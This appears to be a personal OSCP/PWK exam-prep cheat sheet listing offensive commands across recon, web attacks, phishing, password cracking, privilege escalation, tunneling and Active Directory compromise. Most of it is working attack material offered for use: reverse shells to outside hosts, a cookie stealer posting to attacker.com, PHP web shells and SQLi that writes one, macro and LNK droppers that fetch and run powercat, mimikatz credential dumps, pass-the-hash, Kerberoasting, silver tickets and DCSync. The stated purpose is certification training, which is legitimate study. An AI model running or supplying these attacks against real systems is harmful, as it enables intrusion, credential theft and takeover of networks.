OSCP Preparation Notes

This is the reference I compiled while going through the PWK course and grinding OSCP labs. It covers the full exam scope: passive and active recon, web exploitation, client-side attacks, credential cracking, privilege escalation on both Windows and Linux, port tunneling, and Active Directory attacks — distilled into commands I actually used, with just enough context to remember why each technique works.

Think of it as a living cheat sheet, not a tutorial. If something is here, I hit it in a lab or the exam.

Sections

Recon

Passive + active, DNS, Nmap, SMB, SNMP

Web Attacks

XSS, SQLi, LFI/RFI, upload, command injection

Client-side

Macros, library files, file delivery, SMTP

Passwords

Hydra, Hashcat, NTLM, PtH, NTLMv2 relay

Windows PE

Services, DLL hijack, scheduled tasks, tokens

Linux PE

SUID, sudo, cron, capabilities, kernel

Tunneling

SSH local/remote/dynamic, socat, sshuttle, Plink

DPI Bypass

ligolo-ng, chisel, DNS tunneling (dnscat2)

Active Directory

Enum, Kerberoast, Silver/Golden tickets, DCSync

Lateral Movement

WMI, WinRM, PsExec, PtH, Pass the Ticket, DCOM

Shell Setup

Interactive shell upgrade:

sudo rlwrap -cAr nc -lnvp [port]

Upgrade to full TTY:

script /dev/null -c /bin/bash
# CTRL+Z
stty raw -echo; fg
# press Enter twice, then:
export TERM=xterm

SSH without host key verification:

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" learner@192.168.50.52

UserKnownHostsFile=/dev/null stops key recording. StrictHostKeyChecking=no skips authenticity verification — useful in labs, dangerous in production.

Information Gathering

Passive

Whoiswhois [domain] -h [host]Google dorkssite: filetype: ext: intitle: — combine with "" SubdomainNetcraft → site reportGitHubowner: path:Shodanhostname: port:TLS/Headerssecurityheaders.com · Qualys SSLLabs

Active — DNS Enumeration

Record types: NS A AAAA MX PTR CNAME TXT

host [domain]
host -t mx [domain]
host -t txt [domain]

Brute-force forward DNS with DnsRecon:

dnsrecon -d [domain] -t std
dnsrecon -d [domain] -D /usr/share/seclists/Discovery/DNS/namelist.txt -t brt

Windows nslookup:

nslookup -type=TXT [domain] [nameserver]

Active — Port Scanning

All TCP ports (fast):

sudo nmap --min-rate 10000 -p- {ip} -oA nmap/ports

Extract open ports for the next scan:

cat ports.nmap | grep open | awk -F '/' '{print $1}' | tr '\n\r' ','

Version + OS scan on open ports:

sudo nmap -sT -sV -O -p{ports} {ip}

Top 100 UDP:

sudo nmap -sU --top-ports 100 {ip}

PowerShell TCP scan (no Nmap):

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151",$_)) "TCP port $_ is open"} 2>$null

Active — SMB Enumeration (ports 139, 445)

nmap -v -p 139,445 --script smb-os-discovery {ip}
crackmapexec smb smb.txt -u "alfred" -p "" --shares --rid-brute

List shares (Windows and Linux):

net view \\dc01 /all

Active — SMTP (port 25)

nc -nv [ip] 25
VRFY [username]

Active — SNMP (UDP 161)

sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt
onesixtyone -c community -i ips
snmpwalk -c public -v1 -t 10 192.168.50.151
snmpwalk -c public -v 1 192.168.50.151 [MIB]
snmpwalk -v X -c public [IP] NET-SNMP-EXTEND-MIB::nsExtendOutputFull

Useful Windows SNMP MIBs:

OID	Information
1.3.6.1.2.1.25.1.6.0	System Processes
1.3.6.1.2.1.25.4.2.1.2	Running Programs
1.3.6.1.2.1.25.4.2.1.4	Processes Path
1.3.6.1.2.1.25.2.3.1.4	Storage Units
1.3.6.1.2.1.25.6.3.1.2	Software Name
1.3.6.1.4.1.77.1.2.25	User Accounts
1.3.6.1.2.1.6.13.1.3	TCP Local Ports

Vulnerability Scanning

Nessus

sudo systemctl start nessusd.service
# Go to https://127.0.0.1:8834

Nmap NSE

nmap -sV --script "vuln" {ip}
# Custom .nse: copy to /usr/share/nmap/scripts/ then --script ""

Web Application Attacks

API Enumeration

gobuster dir -u {url} -w /usr/share/wordlists/dirb/big.txt -p pattern.txt
# pattern.txt:
# {GOBUSTER}/v1
# {GOBUSTER}/v2

Don't forget robots.txt and sitemap.xml.

curl flags: -d POST · -H header · -i include response headers · -X method · -L follow redirect

XSS

Common test characters: < > ' " { } ;

Encode a large JS payload to bypass filters:

function encode_to_javascript(string) {
    var input = string;
    var output = '';
    for (var pos = 0; pos < input.length; pos++) {
        output += input.charCodeAt(pos);
        if (pos != (input.length - 1)) output += ",";
    }
    return output;
}
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)

Execute encoded payload:

<script>eval(String.fromCharCode(118,97,....))</script>

Cookie stealer test:

<img src="https://attacker.com/?cookie="+btoa(document.cookie)>

Minify JS at JScompress before encoding.

Directory Traversal

../../../../etc/passwd
../../../../home/offsec/.ssh/id_rsa

Windows: use ..\ instead. Sensitive IIS config: C:\inetpub\wwwroot\web.config.

Encoding: . → %2e. Use curl --path-as-is to skip auto-encoding; --data-urlencode for POST values.

LFI

Include a file in the app's running code → execution:

<?php echo system($_GET['cmd']); ?>

Poison access.log via User-Agent, then:

?page=../../../../../var/log/apache2/access.log&cmd=ls+-la

Linux reverse shell via LFI:

bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"

PHP Wrappers:

# Read source without executing
?page=php://filter/resource=admin.php
?page=php://filter/convert.base64-encode/resource=admin.php
 
# RCE via data:// (requires allow_url_include)
?page=data://text/plain,<?php%20echo%20system('ls');?>
?page=data://text/plain;base64,PD9waHAgZW...&cmd=ls

RFI

Requires allow_url_include=On:

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>"; die;
}
?>

# Host file then:
?page=http://192.168.119.3/simple-backdoor.php&cmd=ls

File Upload

Extension bypasses: .phps · .php7 · .phtml · .pHP

Create Windows reverse shell payload:

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);...'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText

Execute via upload:

curl http://target/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwA...

Non-executable upload — overwrite authorized_keys:

ssh-keygen
cat fileup.pub > authorized_keys
# upload to ../../../root/.ssh/authorized_keys
ssh -p 2222 -i fileup root@target.com

Kali web shells

Pre-built web shells live at /usr/share/webshells — ready to upload without modification.

Command Injection

Git bypass: append %3b (;) after the version string.

Check execution environment:

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Powercat reverse shell via command injection:

IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.45.201/powercat.ps1");powercat -c 192.168.45.201 -p 443 -e powershell

URL-encode and send via curl -X POST.

SQL Injection

MySQL basics:

mysql -u root -p'root' -h 192.168.50.16 -P 3306
select version(); select system_user(); show databases;
SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec';

MSSQL basics:

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;

Error-based:

' OR 1=1 -- //
' OR 1=1 in (select @@version) -- //

Union-based — find column count:

' ORDER BY 1 -- //
' ORDER BY 2 -- //   (increment until error)

Union enumeration:

' UNION SELECT database(), user(), @@version, null, null -- //
' union select null, table_name, column_name, table_schema, null
    from information_schema.columns where table_schema=database() -- //
' UNION SELECT null, username, password, description, null FROM users -- //

Blind SQLi:

' AND 1=1 -- //
' AND IF (1=1, sleep(3),'false') -- //

MSSQL code execution:

EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

Write PHP webshell via SQLi:

' UNION SELECT "<?php system($_GET['cmd']);?>",null,null,null,null
    INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

sqlmap (noisy — last resort):

sqlmap -u http://target/blindsqli.php?user=1 -p user
sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
sqlmap -u "..." --sql-query "{query}"

Client-side Attacks

Metadata extraction:

exiftool -a -u [file]   # → Create Date, Modify Date, Author

Browser fingerprinting: Canarytokens — grab browser, IP, OS from a target click.

Microsoft Office Macros

Files: .docm or .doc. View → Macro → create. Macro runs on open:

Sub AutoOpen()
    MyMacro
End Sub
Sub Document_Open()
    MyMacro
End Sub
Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    ' ... (split base64 with python script below)
    Str = Str + "A== "
    CreateObject("Wscript.Shell").Run Str
End Sub

Python helper to split base64 into 50-char VBA strings:

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdw..."
n = 50
for i in range(0, len(str), n):
    print('Str = Str + "' + str[i:i+n] + '"')

File Transfer Methods

certutil:

certutil -encode inputFile encodedFile
certutil -decode encodedFile outputFile
certutil -urlcache -split -f "http://kali/file" output_file

SMB share:

# Kali:
impacket-smbserver test . -smb2support -username user -password pass
# Windows:
net use m: \\KaliIP\test /user:user pass
copy mimikatz.log m:\

Netcat:

# Receiver:
nc -l -p 1234 > received_file.zip
# Sender:
nc -w 3 [kali] 1234 < out.file

xfreerdp drive mount:

xfreerdp /cert-ignore /u:offsec /p:lab /v:192.168.212.250 /drive:test,/home/kali/
# Windows:
copy mimikatz.log \\tsclient\test\mimikatz.log

PowerShell HTTP server:

$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add("http://*:80/")
$listener.Start()
while ($listener.IsListening) {
    $context = $listener.GetContext()
    $response = $context.Response
    $filePath = $context.Request.Url.LocalPath.Substring(1)
    if (Test-Path $filePath) {
        $fileBytes = [System.IO.File]::ReadAllBytes($filePath)
        $response.ContentLength64 = $fileBytes.Length
        $response.OutputStream.Write($fileBytes, 0, $fileBytes.Length)
    } else { $response.StatusCode = 404 }
    $response.OutputStream.Close()
}

Windows Library + LNK Phishing

Set up a WebDAV share:

pip3 install wsgidav
mkdir /home/kali/webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

config.Library-ms content (point to your WebDAV URL):

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
  <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
  <searchConnectorDescription>
    <isDefaultSaveLocation>true</isDefaultSaveLocation>
    <isSupported>false</isSupported>
    <simpleLocation>
      <url>http://192.168.45.240</url>
    </simpleLocation>
  </searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

LNK shortcut target (automatic_configuration):

powershell.exe -nop -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8000/powercat.ps1'); powercat -c 192.168.45.173 -p 443 -e powershell"

Deliver via SMB:

smbclient //192.168.159.195/share -c 'put config.Library-ms'

Send Malicious Email (SMTP port 25)

sudo swaks -t target@corp.com --from attacker@corp.com \
  --attach @config.Library-ms --server 192.168.159.199 \
  --body @body.txt --header "Subject: IT Setup" --suppress-data -ap

Public Exploits

Online: Exploit-DB · PacketStorm · GitHub

firefox --search "Microsoft Edge site:exploit-db.com"

Offline (searchsploit):

sudo apt update && sudo apt install exploitdb
searchsploit [service name]
searchsploit [name] -m [EDB-ID]    # copy to current dir

Nmap NSE exploits:

grep Exploits /usr/share/nmap/scripts/*.nse
nmap --script-help=clamav-exec.nse

Always check before running

Read exploit code before executing. A newer app version doesn't mean it's not vulnerable — patches are often incomplete. The version the exploit author used may differ from yours; test locally first.

Fixing Exploits

Buffer Overflow

Avoid DoS exploits when better alternatives exist. Focus on shellcode replacement.

Cross-compile for Windows on Kali:

sudo apt install mingw-w64
i686-w64-mingw32-gcc 42341.c -o exploit.exe
i686-w64-mingw32-gcc 42341.c -o exploit.exe -lws2_32   # if linker error

Generate custom shellcode (respecting bad chars from the PoC):

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 \
  EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Web Exploits Checklist

HTTP vs HTTPS? Which route? Pre-auth or authenticated?
Default credentials? Self-signed cert → add verify=False to requests
Python 2 → 3 conversion: sudo apt install 2to3 && 2to3 file.py -w
Base64 in Python 3: str → bytes with .encode('UTF-8') and .decode('UTF-8')

Password Attacks

SSH & RDP Brute Force

hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
hydra -L names.txt -p "SuperS3cure1337#" rdp://192.168.50.202

Flags: -s port · -L/-l user list/user · -P/-p pass list/pass · -R resume

HTTP POST Form

hydra -l user -P rockyou.txt 192.168.50.201 \
  http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed"

For Basic Auth (http-get), grab the raw request from Burp, replace newlines with \r\n:

# vim: :%s/\n/\\r\\n/g
hydra -L userlist.txt -P passlist.txt 192.168.229.201 http-get / \
  -m "GET / HTTP/1.1\r\nHost: ...\r\nAuthorization: Basic ^USER^:^PASS^\r\n\r\n" -f

Hashcat

hashcat [hash] [dictionary] -m [type] -a [mode] -r [rule]
hashcat --help | grep -i "KeePass"
echo \$1 > demo.rule   # append "1" to every candidate

Rule syntax: c = capitalise · u d = uppercase + duplicate · variety at /usr/share/hashcat/rules/

Identify hash type: hash-identifier or hashid

KeePass (.kdbx):

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

# keepass2john → remove first col → hashcat mode 13400
hashcat -m 13400 keepass.hash rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

SSH Private Key:

ssh2john id_rsa > ssh.hash   # remove first col
sudo sh -c 'cat ssh.rule >> /etc/john/john.conf'
john --wordlist=ssh.passwords --rules=sshRules ssh.hash

Cracking NTLM

Requires Administrator + SeDebugPrivilege:

# In mimikatz:
privilege::debug
token::elevate
lsadump::sam
 
# One-liner:
mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" \
  "lsadump::cache" "lsadump::sam" "sekurlsa::ekeys" "lsadump::lsa /inject" "exit"

NTLM → hashcat mode 1000. MsCacheV2 → format $DCC2$10240#username#hash → mode 2100.

Pass-the-Hash

smbclient \\\\192.168.50.212\\secrets -U Administrator \
  --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
 
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b \
  Administrator@192.168.164.212
 
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b \
  Administrator@192.168.50.212

Net-NTLMv2 Capture & Relay

Capture:

sudo responder -I tun0
# Target does: dir \\[kali-ip]\test  → triggers auth
# Web app trick: change filename to UNC path with double backslash

Crack captured hash with hashcat mode 5600.

Relay (if can't crack):

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 \
  -c "powershell -enc JABjAGwAaQBlAG4AdA..."
# Host1 does: dir \\[kali]\test → shell arrives from Host2

Condition: UAC remote restrictions disabled or local administrator on target.

Windows Privilege Escalation

Situation Awareness

whoami /groups                          # current user groups
net user [user]
Get-LocalUser; net user                 # all local users
Get-LocalGroup; net localgroup          # all local groups
Get-LocalGroupMember [Group]
systeminfo                              # OS, version, arch
ipconfig /all; route print; netstat -ano
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-Process
Get-Process -Name "[name]" | select *

Sensitive File Hunting

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

PowerShell History

Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PuTTY saved sessions:

reg query "HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions"

Interactive shell as another user: runas /user:[username] cmd

PS-Session:

$password = ConvertTo-SecureString "pass" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("daveadmin",$password)
Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred

Evil-WinRM: evil-winrm -i 192.168.50.220 -u daveadmin -p "pass"

Automation

# WinPEAS
iwr -uri http://192.168.118.2/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe
 
# SeatBelt
.\Seatbelt.exe -group=all

Service Binary Hijacking

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Check write permissions: icacls [path] → F=Full M=Modify W=Write RX=Read+execute

Malicious adduser.c:

#include <stdlib.h>
int main() {
    system("net user ivan password123! /add");
    system("net localgroup administrators ivan /add");
    return 0;
}

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Replace binary → restart service:

iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
net stop mysql

If SeShutdownPrivilege available: shutdown /r /t 0

RunasCs for admin shell (if user is in Administrators group):

RunasCs.exe ivan password123! cmd.exe -r 192.168.45.213:443

Service DLL Hijacking

# Enumerate → check icacls → use Procmon to find missing DLL
$env:path    # check writable paths in PATH
Restart-Service BetaServ.exe

myDLL.cpp:

#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            system("net user ivan password123! /add");
            system("net localgroup administrators ivan /add");
            break;
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
# Or via msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.225 LPORT=443 -f dll -o svc.dll

Unquoted Service Path

Find services with spaces and no quotes:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """"

Example path → execution order:

C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
→ C:\Program.exe
→ C:\Program Files\Enterprise.exe
→ C:\Program Files\Enterprise Apps\Current.exe   ← plant here

Check write permissions on each dir level → upload malicious binary → Start-Service.

Automation with PowerUp

iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx'
Get-UnquotedService

Scheduled Tasks

Get-ScheduledTask
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /i 'Author'

Check binary permissions → replace with malicious → wait for execution.

SeImpersonatePrivilege

IIS workers (LocalService, NetworkService, ApplicationPoolIdentity) all have this.

.\PrintSpoofer64.exe -i -c powershell.exe
# → AUTHORITY\SYSTEM

Windows PE Tools

FullPowersRestore default token privileges for service accountsRunasCsRun commands as another user with credentialsGodPotatoSeImpersonatePrivilege → SYSTEM: GodPotato -cmd "cmd /c whoami"WinPEASAutomated Windows PE enumerationSeatBelt.\Seatbelt.exe -group=all

Linux Privilege Escalation

Basic Enumeration

id; cat /etc/passwd; hostname
cat /etc/issue; cat /etc/os-release; uname -a
ps aux; ip a; routel; netstat -ano; ss -anp
cat /etc/iptables/rules.v4
dpkg -l
find / -writable -type d 2>/dev/null
cat /etc/fstab; mount; lsblk
lsmod; /sbin/modinfo [module]

Automated:

unix-privesc-check standard > output.txt
# Also: LinEnum, LinPEAS

Exposed Credentials

env; cat ~/.bashrc
find . -type f -name "*.xml" -exec grep -ri "password" {} +
crunch 6 6 -t Lab%%% > wordlist    # generate custom wordlist
hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V

Monitor running processes:

watch -n 1 "ps aux | grep pass"
sudo tcpdump -i lo -A | grep "pass"

Cron Jobs

grep "CRON" /var/log/syslog
ls -lah /etc/cron*; crontab -l; cat /etc/crontab

If you have write permission to a cron script:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> [script]

Writable `/etc/passwd`

openssl passwd password123!
echo 'root2:$1$w6X9xROw$Y0CB8xl.M80jVxE/utQwb.:0:0:root:/root:/bin/bash' >> /etc/passwd
su root2   # password: password123!

SUID / Capabilities

find / -perm -u=s -type f 2>/dev/null
find / -perm -04000 -type f 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

→ Check GTFOBins for abuse methods.

Sudo

sudo -l            # see allowed commands for current user
sudo -V            # check for vulnerable versions (e.g., 1.8.31)

→ GTFOBins sudo filter.

Kernel Exploits

cat /etc/issue; uname -r; arch
# searchsploit [kernel version]
# e.g. Build 22621 → CVE-2023-29360

Port Redirection & SSH Tunneling

Concepts: WAN = wide network · DMZ = buffer zone between hosts

ip a; ip route     # check interfaces and routes

socat Port Forward (Linux)

Forward 192.168.x:2345 → 10.4.x:5432:

socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432

SSH Local Port Forward

# On the jump host: access target:445 via kali's port 4455
ssh -N -L 0.0.0.0:4455:[target]:445 username@[ssh-server]

Example — enumerate SMB through the tunnel:

smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234

SSH Dynamic Port Forward (SOCKS)

# On jump host:
ssh -N -D 0.0.0.0:9999 username@[ssh-server]
# kali /etc/proxychains4.conf: add "socks5 192.168.50.63 9999"
proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

SSH Remote Port Forward

# On target (push a port back to kali):
ssh -N -R 127.0.0.1:2345:[target]:5432 kali@192.168.118.4
# kali can now connect to 127.0.0.1:2345

SSH Remote Dynamic (SOCKS from target)

Requires OpenSSH client ≥ 7.6 on target:

# Target:
ssh -N -R 9998 kali@192.168.118.4
# kali /etc/proxychains4.conf: "socks5 127.0.0.1 9998"
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64

sshuttle

socat tcp-l:2222,fork TCP:[host2]:22   # forward SSH port first
sshuttle -r username@[host1]:2222 [host2]/24 [host3]/24

Windows — ssh.exe

where ssh    # C:\Windows\System32\OpenSSH\ssh.exe
ssh.exe -V   # >= 7.6 supports remote dynamic forwarding
ssh -N -R 9998 kali@[kali-ip]
# kali: "socks5 127.0.0.1 9998" in proxychains4.conf

Windows — Plink

When firewall only allows TCP/80 outbound:

find / -name plink.exe 2>/dev/null   # locate on kali

plink.exe -ssh -l kali -pw PASSWORD -R 127.0.0.1:9833:127.0.0.1:3389 [kali-ip]

9833 <- 3389: connect RDP on kali via 127.0.0.1:9833.

Windows — Netsh

Requires local admin. Adds portproxy rule:

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=[host1] connectport=22 connectaddress=[host2]
netsh interface portproxy show all
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=[host1] localport=2222 action=allow
# Clean up:
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=[host1]

Tunneling Through Deep Packet Inspection

ligolo-ng

sudo apt install ligolo-ng
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:443

On target:

./agent -connect [kali_ip]:443 -ignore-cert

Set up tunnel in proxy console:

session
ifconfig
# add route for target's internal subnet:
sudo ip route add 192.168.56.0/24 dev ligolo
start
# Nmap through ligolo: add --unprivileged

Port forwarding within ligolo:

ligolo listener_add --addr [host2]:80 --to [host1]:80 --tcp

chisel (HTTP tunnel)

# Kali:
chisel server --port 8080 --reverse
# Target:
chisel client [kali_ip]:8080 R:socks
# kali /etc/proxychains4.conf: "socks5 127.0.0.1:1080"

Debug output:

chisel client [kali_ip]:8080 R:socks &> /tmp/output; curl --data @/tmp/output http://[kali_ip]:8080/

DNS Tunneling with dnscat2

# DNS server:
sudo dnsmasq -C dnsmasq.conf -d
sudo tcpdump -i ens192 udp port 53
dnscat2-server feline.corp
# Target:
./dnscat feline.corp

In dnscat2 console:

windows           # list sessions
window -i 1
listen 127.0.0.1:4455 172.16.2.11:445

DNS tunnel vs direct

DNS tunneling is significantly slower than TCP-based tunnels. Use it only when HTTP/HTTPS are blocked and only DNS egress is available. ligolo-ng or chisel is strongly preferred when you have any TCP egress.

Active Directory

Manual Enumeration — Windows Tools

net user /domain
net user [username] /domain
net group /domain
net group [groupname] /domain

PowerView

powershell -ep bypass
Import-Module ./PowerView.ps1
 
Get-Domain
Get-DomainUser | select cn,pwdlastset,lastlogon
Get-DomainGroup | select cn
Get-DomainGroupMember "Sales Department"
Get-DomainComputer | select Name,operatingsystem,dnshostname
Find-LocalAdminAccess
Get-NetSession -ComputerName [ComputerName]
.\PsLoggedon.exe \\[ComputerName]
Get-DomainUser -SPN | select samaccountname,serviceprincipalname

ACE Enumeration

AD permission types:

GenericAllFull permissions on objectGenericWriteEdit certain attributesWriteOwnerChange ownershipWriteDACLEdit ACEs applied to objectAllExtendedRightsChange/reset password, etc.ForceChangePasswordForce password changeSelfSelf-membership — add yourself to a group

Get-ObjectAcl -Identity [username]
Convert-SidToName [SID]
"[SID1]","[SID2]" | Convert-SidToName
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
net group "[groupname]" [username] /add /domain

Domain Shares

Find-DomainShare
Find-DomainShare -CheckShareAccess    # only accessible ones
# Focus on SYSVOL → Policy folders
# gpp-decrypt can decrypt GPP passwords

BloodHound

# Upload SharpHound to target:
Import-Module .\SharpHound.ps1
Invoke-BloodHound -c All -OutputDirectory C:\temp -OutputPrefix results

sudo neo4j start   # → http://localhost:7474  (neo4j:bloodhound)
bloodhound         # import zip

Useful Cypher queries:

MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Password Spraying

Check lockout policy first:

net accounts   # → Lockout threshold, duration, observation window

# Windows (Spray-Passwords.ps1):
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin
# Kali (crackmapexec):
crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
# Pwn3d! → use --sam to dump hashes
.\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"

AS-REP Roasting

Condition: Do not require Kerberos preauthentication enabled

python GetNPUsers.py corp.com/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
python GetNPUsers.py corp.com/user:pass -request -format hashcat -outputfile hashes.asreproast

.\Rubeus.exe asreproast /nowrap

Hashcat mode: 18200

Kerberoasting

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
# If KRB_AP_ERR_SKEW → sync time with ntpdate/rdate

Hashcat mode: 13100

Silver Tickets

# 1. Dump creds (need admin):
privilege::debug
sekurlsa::logonpasswords
 
# 2. Get domain SID (strip last 4 digits):
whoami /user
 
# 3. Forge ticket:
kerberos::golden /sid:S-1-5-21-... /domain:corp.com /ptt \
  /target:web04.corp.com /service:http \
  /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
 
# 4. Use it:
klist
$response = iwr -UseDefaultCredentials http://web04.corp.com

DCSync

Needs Domain Admin / Enterprise Admin / Administrators membership:

# mimikatz:
lsadump::dcsync /user:corp\Administrator
lsadump::dcsync /domain:medtech.com /all

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70

Lateral Movement in AD

WMI

wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"

PowerShell reverse shell via CIM:

$username = 'jen'; $password = 'Nexus123!'
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create \
  -Arguments @{CommandLine = 'powershell -nop -w hidden -e JABjAGwA...'}

WinRM (ports 5985/5986)

winrs -r:files04 -u:jen -p:Nexus123! "powershell -nop -w hidden -e JABjAGwA..."
 
$secureString = ConvertTo-SecureString "Nexus123!" -AsPlaintext -Force
$credential = New-Object System.Management.Automation.PSCredential 'jen', $secureString
New-PSSession -ComputerName 192.168.50.73 -Credential $credential
Enter-PSSession 1

PsExec

Conditions: user is local Admin · ADMIN$ share available · File & Printer Sharing on

./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd

Pass the Hash

/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

Overpass the Hash

NTLM hash → TGT → TGS → code execution:

sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
net use \\files04        # triggers TGT request
klist                    # verify TGT
.\PsExec.exe \\files04 cmd

Pass the Ticket

privilege::debug
sekurlsa::tickets /export
dir *.kirbi
kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

